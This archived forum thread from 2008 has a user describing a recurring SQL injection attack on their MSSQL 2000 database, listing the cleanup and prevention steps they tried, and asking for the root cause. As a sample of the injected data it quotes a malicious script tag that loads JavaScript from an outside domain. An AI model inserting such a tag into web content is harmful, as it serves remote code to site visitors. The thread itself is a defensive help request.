Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
CincoPistolero
Starting Member
1 Post |
 Posted - 2008-07-14 : 15:40:25
|
It appears that one table in my db is the victim of sql injection. Originally two extra tables were added to my db, and all my dbs tables were added to the Master DB. Every day around 9am, malicious data gets added to one of my tables. I have to clean it up everyday. I have done the following to try and prevent this.1) Change admin password to backend2) Change sql user login and password for the DB3) Removed extra tables in my db4) Removed extra tables from Master db5) complete virus scan of server. 6) Searched webpages for offending data being added7) I had a test server in place with same db that had not been infected. I pointed my website at that and the next day it was infected.8) sql server is up to date on all patches and versions as is the Windows ServerWindows2003ServerMSSQL 2000sample of data being inserted into my db(I get a different entry every day)Code:script src=www.grabdp.com/ngg.js></script> <I need to know the root cause of this and how to block/fix it.Any help is appreciated.Thank you. |
|
|
tkizer
Almighty SQL Goddess
38200 Posts |
|
|
|
|
|
Victim of sqlinjection